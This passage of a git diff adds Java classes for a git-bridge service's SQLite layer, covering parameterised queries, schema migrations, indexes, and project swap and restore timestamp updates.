index 0000000..25beb18 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetPathForURLInProjectSQLQuery.java @@ -0,0 +1,43 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.PreparedStatement; +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by Winston on 20/11/14. 
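+ *
+ * Illustrative use, via DBStore#getPathForURLInProject (the project name
+ * and URL here are made up):
+ * <pre>{@code
+ * String path = dbStore.getPathForURLInProject("proj1", "https://example.com/fig1.png");
+ * // path is null if there is no url_index_store entry for that pair
+ * }</pre>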
+ */ +public class GetPathForURLInProjectSQLQuery implements SQLQuery<String> { + + private static final String GET_URL_INDEXES_FOR_PROJECT_NAME = + "SELECT `path` " + "FROM `url_index_store` " + "WHERE `project_name` = ? " + "AND `url` = ?"; + + private final String projectName; + private final String url; + + public GetPathForURLInProjectSQLQuery(String projectName, String url) { + this.projectName = projectName; + this.url = url; + } + + @Override + public String processResultSet(ResultSet resultSet) throws SQLException { + String path = null; + while (resultSet.next()) { + path = resultSet.getString("path"); + } + return path; + } + + @Override + public String getSQL() { + return GET_URL_INDEXES_FOR_PROJECT_NAME; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + statement.setString(2, url); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetProjectNamesSQLQuery.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetProjectNamesSQLQuery.java new file mode 100644 index 0000000..d56ad5c --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetProjectNamesSQLQuery.java @@ -0,0 +1,29 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import java.util.ArrayList; +import java.util.List; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by Winston on 21/02/15. + */ +public class GetProjectNamesSQLQuery implements SQLQuery<List<String>> { + + private static final String GET_URL_INDEXES_FOR_PROJECT_NAME = "SELECT `name` FROM `projects`"; + + @Override + public List<String> processResultSet(ResultSet resultSet) throws SQLException { + List<String> projectNames = new ArrayList<>(); + while (resultSet.next()) { + projectNames.add(resultSet.getString("name")); + } + return projectNames; + } + + @Override + public String getSQL() { + return GET_URL_INDEXES_FOR_PROJECT_NAME; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetProjectState.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetProjectState.java new file mode 100644 index 0000000..a291695 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetProjectState.java @@ -0,0 +1,43 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.PreparedStatement; +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.ProjectState; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by winston on 24/08/2016. 
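+ *
+ * Since `name` is the primary key of `projects`, this query returns at
+ * most one row: no row means NOT_PRESENT, a NULL `last_accessed` means
+ * SWAPPED, and anything else means PRESENT.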
+ */ +public class GetProjectState implements SQLQuery<ProjectState> { + + private static final String GET_PROJECT_STATE = + "SELECT `last_accessed`\n" + " FROM `projects`\n" + " WHERE `name` = ?"; + + private final String projectName; + + public GetProjectState(String projectName) { + this.projectName = projectName; + } + + @Override + public String getSQL() { + return GET_PROJECT_STATE; + } + + @Override + public ProjectState processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + if (resultSet.getTimestamp("last_accessed") == null) { + return ProjectState.SWAPPED; + } + return ProjectState.PRESENT; + } + return ProjectState.NOT_PRESENT; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetSwapCompression.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetSwapCompression.java new file mode 100644 index 0000000..b21ec3e --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/GetSwapCompression.java @@ -0,0 +1,36 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.PreparedStatement; +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +public class GetSwapCompression implements SQLQuery<String> { + private static final String GET_SWAP_COMPRESSION = + "SELECT `swap_compression` FROM `projects` WHERE `name` = ?"; + + private final String projectName; + + public GetSwapCompression(String projectName) { + this.projectName = projectName; + } + + @Override + public String processResultSet(ResultSet resultSet) throws SQLException { + String compression = null; + while (resultSet.next()) { + compression = resultSet.getString("swap_compression"); + } + return compression; + } + + @Override + public String getSQL() { + return GET_SWAP_COMPRESSION; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/LastAccessedColumnExists.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/LastAccessedColumnExists.java new file mode 100644 index 0000000..758a47b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/LastAccessedColumnExists.java @@ -0,0 +1,28 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +/* + * Created by winston on 04/09/2016. 
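+ *
+ * PRAGMA table_info returns one row per column of the table, with the
+ * column name in its second field; that is what the getString(2) call
+ * below is reading.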
+ */ +public class LastAccessedColumnExists implements SQLQuery<Boolean> { + + private static final String LAST_ACCESSED_COLUMN_EXISTS = "PRAGMA table_info(`projects`)"; + + @Override + public String getSQL() { + return LAST_ACCESSED_COLUMN_EXISTS; + } + + @Override + public Boolean processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + if (resultSet.getString(2).equals("last_accessed")) { + return true; + } + } + return false; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/RestoreTimeColumnExists.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/RestoreTimeColumnExists.java new file mode 100644 index 0000000..c726bec --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/RestoreTimeColumnExists.java @@ -0,0 +1,24 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +public class RestoreTimeColumnExists implements SQLQuery<Boolean> { + private static final String RESTORE_TIME_COLUMN_EXISTS = "PRAGMA table_info(`projects`)"; + + @Override + public String getSQL() { + return RESTORE_TIME_COLUMN_EXISTS; + } + + @Override + public Boolean processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + if (resultSet.getString(2).equals("restore_time")) { + return true; + } + } + return false; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/SwapCompressionColumnExists.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/SwapCompressionColumnExists.java new file mode 100644 index 0000000..89f083a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/SwapCompressionColumnExists.java @@ -0,0 +1,24 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +public class SwapCompressionColumnExists implements SQLQuery<Boolean> { + private static final String SWAP_COMPRESSION_COLUMN_EXISTS = "PRAGMA table_info(`projects`)"; + + @Override + public String getSQL() { + return SWAP_COMPRESSION_COLUMN_EXISTS; + } + + @Override + public Boolean processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + if (resultSet.getString(2).equals("swap_compression")) { + return true; + } + } + return false; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/SwapTimeColumnExists.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/SwapTimeColumnExists.java new file mode 100644 index 0000000..7d65e21 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/query/SwapTimeColumnExists.java @@ -0,0 +1,24 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.query; + +import java.sql.ResultSet; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLQuery; + +public class SwapTimeColumnExists implements SQLQuery<Boolean> { + private static final String SWAP_TIME_COLUMN_EXISTS = "PRAGMA table_info(`projects`)"; + + @Override + public String getSQL() { + return SWAP_TIME_COLUMN_EXISTS; + } + + @Override + public Boolean processResultSet(ResultSet resultSet) throws SQLException { + while (resultSet.next()) { + if 
(resultSet.getString(2).equals("swap_time")) { + return true; + } + } + return false; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddLastAccessed.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddLastAccessed.java new file mode 100644 index 0000000..31bbadb --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddLastAccessed.java @@ -0,0 +1,17 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.alter; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by winston on 03/09/2016. + */ +public class ProjectsAddLastAccessed implements SQLUpdate { + + private static final String PROJECTS_ADD_LAST_ACCESSED = + "ALTER TABLE `projects`\n" + "ADD COLUMN `last_accessed` DATETIME NULL DEFAULT 0"; + + @Override + public String getSQL() { + return PROJECTS_ADD_LAST_ACCESSED; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddRestoreTime.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddRestoreTime.java new file mode 100644 index 0000000..d4675db --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddRestoreTime.java @@ -0,0 +1,13 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.alter; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class ProjectsAddRestoreTime implements SQLUpdate { + private static final String PROJECTS_ADD_RESTORE_TIME = + "ALTER TABLE `projects`\n" + "ADD COLUMN `restore_time` DATETIME NULL;\n"; + + @Override + public String getSQL() { + return PROJECTS_ADD_RESTORE_TIME; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddSwapCompression.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddSwapCompression.java new file mode 100644 index 0000000..25ec930 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddSwapCompression.java @@ -0,0 +1,13 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.alter; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class ProjectsAddSwapCompression implements SQLUpdate { + private static final String PROJECTS_ADD_SWAP_COMPRESSION = + "ALTER TABLE `projects`\n" + "ADD COLUMN `swap_compression` VARCHAR NULL;\n"; + + @Override + public String getSQL() { + return PROJECTS_ADD_SWAP_COMPRESSION; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddSwapTime.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddSwapTime.java new file mode 100644 index 0000000..e578dc0 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/ProjectsAddSwapTime.java @@ -0,0 +1,13 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.alter; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class ProjectsAddSwapTime implements SQLUpdate { + private static final String PROJECTS_ADD_SWAP_TIME = + "ALTER TABLE `projects`\n" + "ADD COLUMN `swap_time` DATETIME NULL;\n"; + + @Override + public String getSQL() { + return PROJECTS_ADD_SWAP_TIME; + } +} diff --git 
a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/SetSoftHeapLimitPragma.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/SetSoftHeapLimitPragma.java new file mode 100644 index 0000000..0f8d935 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/alter/SetSoftHeapLimitPragma.java @@ -0,0 +1,16 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.alter; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class SetSoftHeapLimitPragma implements SQLUpdate { + private int heapLimitBytes = 0; + + public SetSoftHeapLimitPragma(int heapLimitBytes) { + this.heapLimitBytes = heapLimitBytes; + } + + @Override + public String getSQL() { + return "PRAGMA soft_heap_limit=" + this.heapLimitBytes + ";"; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateIndexURLIndexStore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateIndexURLIndexStore.java new file mode 100644 index 0000000..a408422 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateIndexURLIndexStore.java @@ -0,0 +1,18 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.create; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by Winston on 21/02/15. + */ +public class CreateIndexURLIndexStore implements SQLUpdate { + + public static final String CREATE_INDEX_URL_INDEX_STORE = + "CREATE UNIQUE INDEX IF NOT EXISTS `project_path_index` " + + "ON `url_index_store`(`project_name`, `path`);\n"; + + @Override + public String getSQL() { + return CREATE_INDEX_URL_INDEX_STORE; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateProjectsIndexLastAccessed.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateProjectsIndexLastAccessed.java new file mode 100644 index 0000000..f937fa3 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateProjectsIndexLastAccessed.java @@ -0,0 +1,18 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.create; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by winston on 23/08/2016. + */ +public class CreateProjectsIndexLastAccessed implements SQLUpdate { + + private static final String CREATE_PROJECTS_INDEX_LAST_ACCESSED = + "CREATE INDEX IF NOT EXISTS `projects_index_last_accessed`\n" + + " ON `projects`(`last_accessed`)"; + + @Override + public String getSQL() { + return CREATE_PROJECTS_INDEX_LAST_ACCESSED; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateProjectsTableSQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateProjectsTableSQLUpdate.java new file mode 100644 index 0000000..1e7910c --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateProjectsTableSQLUpdate.java @@ -0,0 +1,25 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.create; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by Winston on 20/11/14. 
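+ *
+ * This CREATE TABLE already includes every column that the ALTER TABLE
+ * migrations add, so on a fresh database the migrations fail harmlessly
+ * (createTables swallows their exceptions) and this statement builds the
+ * full schema in one go.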
+ */ +public class CreateProjectsTableSQLUpdate implements SQLUpdate { + + private static final String CREATE_PROJECTS_TABLE = + "CREATE TABLE IF NOT EXISTS `projects` (\n" + + " `name` VARCHAR NOT NULL DEFAULT '',\n" + + " `version_id` INT NOT NULL DEFAULT 0,\n" + + " `last_accessed` DATETIME NULL DEFAULT 0,\n" + + " `swap_time` DATETIME NULL,\n" + + " `restore_time` DATETIME NULL,\n" + + " `swap_compression` VARCHAR NULL,\n" + + " PRIMARY KEY (`name`)\n" + + ")"; + + @Override + public String getSQL() { + return CREATE_PROJECTS_TABLE; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateURLIndexStoreSQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateURLIndexStoreSQLUpdate.java new file mode 100644 index 0000000..1274eb0 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/create/CreateURLIndexStoreSQLUpdate.java @@ -0,0 +1,27 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.create; + +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by Winston on 20/11/14. + */ +public class CreateURLIndexStoreSQLUpdate implements SQLUpdate { + + private static final String CREATE_URL_INDEX_STORE = + "CREATE TABLE IF NOT EXISTS `url_index_store` (\n" + + " `project_name` varchar(10) NOT NULL DEFAULT '',\n" + + " `url` text NOT NULL,\n" + + " `path` text NOT NULL,\n" + + " PRIMARY KEY (`project_name`,`url`),\n" + + " CONSTRAINT `url_index_store_ibfk_1` " + + "FOREIGN KEY (`project_name`) " + + "REFERENCES `projects` (`name`) " + + "ON DELETE CASCADE " + + "ON UPDATE CASCADE\n" + + ");\n"; + + @Override + public String getSQL() { + return CREATE_URL_INDEX_STORE; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteAllFilesInProjectSQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteAllFilesInProjectSQLUpdate.java new file mode 100644 index 0000000..a23a468 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteAllFilesInProjectSQLUpdate.java @@ -0,0 +1,23 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.delete; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class DeleteAllFilesInProjectSQLUpdate implements SQLUpdate { + private final String projectName; + + public DeleteAllFilesInProjectSQLUpdate(String projectName) { + this.projectName = projectName; + } + + @Override + public String getSQL() { + return "DELETE FROM `url_index_store` WHERE `project_name` = ?"; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteFilesForProjectSQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteFilesForProjectSQLUpdate.java new file mode 100644 index 0000000..5c3527a --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteFilesForProjectSQLUpdate.java @@ -0,0 +1,43 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.delete; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; 
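+
+// Builds a parameterised "IN (...)" clause with one '?' placeholder per
+// path, e.g. "... WHERE `project_name` = ? AND path IN (?, ?)" for two
+// paths; addParametersToStatement then binds the project name at index 1
+// and the paths from index 2 onwards.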
+ +/* + * Created by Winston on 20/11/14. + */ +public class DeleteFilesForProjectSQLUpdate implements SQLUpdate { + + private static final String DELETE_URL_INDEXES_FOR_PROJECT_NAME = + "DELETE FROM `url_index_store` " + "WHERE `project_name` = ? AND path IN ("; + + private final String projectName; + private final String[] paths; + + public DeleteFilesForProjectSQLUpdate(String projectName, String... paths) { + this.projectName = projectName; + this.paths = paths; + } + + @Override + public String getSQL() { + StringBuilder sb = new StringBuilder(DELETE_URL_INDEXES_FOR_PROJECT_NAME); + for (int i = 0; i < paths.length; i++) { + sb.append("?"); + if (i < paths.length - 1) { + sb.append(", "); + } + } + sb.append(");\n"); + return sb.toString(); + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + for (int i = 0; i < paths.length; i++) { + statement.setString(i + 2, paths[i]); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteProjectSQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteProjectSQLUpdate.java new file mode 100644 index 0000000..ff989e1 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteProjectSQLUpdate.java @@ -0,0 +1,23 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.delete; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class DeleteProjectSQLUpdate implements SQLUpdate { + private final String projectName; + + public DeleteProjectSQLUpdate(String projectName) { + this.projectName = projectName; + } + + @Override + public String getSQL() { + return "DELETE FROM `projects` WHERE `name` = ?"; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/AddURLIndexSQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/AddURLIndexSQLUpdate.java new file mode 100644 index 0000000..a79ea6d --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/AddURLIndexSQLUpdate.java @@ -0,0 +1,41 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.insert; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by Winston on 20/11/14. 
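+ *
+ * `url_index_store` has PRIMARY KEY (`project_name`, `url`), so this
+ * INSERT OR REPLACE updates the stored path when the same URL is added
+ * to a project again.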
+ */ +public class AddURLIndexSQLUpdate implements SQLUpdate { + + private static final String ADD_URL_INDEX = + "INSERT OR REPLACE INTO `url_index_store`(" + + "`project_name`, " + + "`url`, " + + "`path`" + + ") VALUES " + + "(?, ?, ?)\n"; + + private final String projectName; + private final String url; + private final String path; + + public AddURLIndexSQLUpdate(String projectName, String url, String path) { + this.projectName = projectName; + this.url = url; + this.path = path; + } + + @Override + public String getSQL() { + return ADD_URL_INDEX; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + statement.setString(2, url); + statement.setString(3, path); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/SetProjectLastAccessedTime.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/SetProjectLastAccessedTime.java new file mode 100644 index 0000000..945f398 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/SetProjectLastAccessedTime.java @@ -0,0 +1,34 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.insert; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import java.sql.Timestamp; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by winston on 23/08/2016. + */ +public class SetProjectLastAccessedTime implements SQLUpdate { + + private static final String SET_PROJECT_LAST_ACCESSED_TIME = + "UPDATE `projects`\n" + "SET `last_accessed` = ?\n" + "WHERE `name` = ?"; + + private final String projectName; + private final Timestamp lastAccessed; + + public SetProjectLastAccessedTime(String projectName, Timestamp lastAccessed) { + this.projectName = projectName; + this.lastAccessed = lastAccessed; + } + + @Override + public String getSQL() { + return SET_PROJECT_LAST_ACCESSED_TIME; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setTimestamp(1, lastAccessed); + statement.setString(2, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/SetProjectSQLUpdate.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/SetProjectSQLUpdate.java new file mode 100644 index 0000000..7c472e0 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/SetProjectSQLUpdate.java @@ -0,0 +1,35 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.insert; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +/* + * Created by Winston on 20/11/14. 
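+ *
+ * INSERT OR REPLACE keyed on the `name` primary key: the same statement
+ * creates the row for a never-seen project and replaces it (refreshing
+ * `last_accessed` to the current time) on subsequent version updates.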
+ */ +public class SetProjectSQLUpdate implements SQLUpdate { + + private static final String SET_PROJECT = + "INSERT OR REPLACE " + + "INTO `projects`(`name`, `version_id`, `last_accessed`) " + + "VALUES (?, ?, DATETIME('now'));\n"; + + private final String projectName; + private final int versionID; + + public SetProjectSQLUpdate(String projectName, int versionID) { + this.projectName = projectName; + this.versionID = versionID; + } + + @Override + public String getSQL() { + return SET_PROJECT; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setString(1, projectName); + statement.setInt(2, versionID); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/UpdateRestore.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/UpdateRestore.java new file mode 100644 index 0000000..bb76748 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/UpdateRestore.java @@ -0,0 +1,37 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.insert; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import java.sql.Timestamp; +import java.time.LocalDateTime; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class UpdateRestore implements SQLUpdate { + private static final String UPDATE_RESTORE = + "UPDATE `projects`\n" + + "SET `last_accessed` = ?,\n" + + " `swap_time` = NULL,\n" + + " `restore_time` = ?,\n" + + " `swap_compression` = NULL\n" + + "WHERE `name` = ?;\n"; + + private final String projectName; + private final Timestamp now; + + public UpdateRestore(String projectName) { + this.projectName = projectName; + this.now = Timestamp.valueOf(LocalDateTime.now()); + } + + @Override + public String getSQL() { + return UPDATE_RESTORE; + } + + @Override + public void addParametersToStatement(PreparedStatement statement) throws SQLException { + statement.setTimestamp(1, now); + statement.setTimestamp(2, now); + statement.setString(3, projectName); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/UpdateSwap.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/UpdateSwap.java new file mode 100644 index 0000000..df09ddc --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/insert/UpdateSwap.java @@ -0,0 +1,39 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.insert; + +import java.sql.PreparedStatement; +import java.sql.SQLException; +import java.sql.Timestamp; +import java.time.LocalDateTime; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SQLUpdate; + +public class UpdateSwap implements SQLUpdate { + private static final String UPDATE_SWAP = + "UPDATE `projects`\n" + + "SET `last_accessed` = NULL,\n" + + " `swap_time` = ?,\n" + + " `restore_time` = NULL,\n" + + " `swap_compression` = ?\n" + + "WHERE `name` = ?;\n"; + + private final String projectName; + private final String compression; + private final Timestamp now; + + public UpdateSwap(String projectName, String compression) { + this.projectName = projectName; + this.compression = compression; + this.now = Timestamp.valueOf(LocalDateTime.now()); + } + + 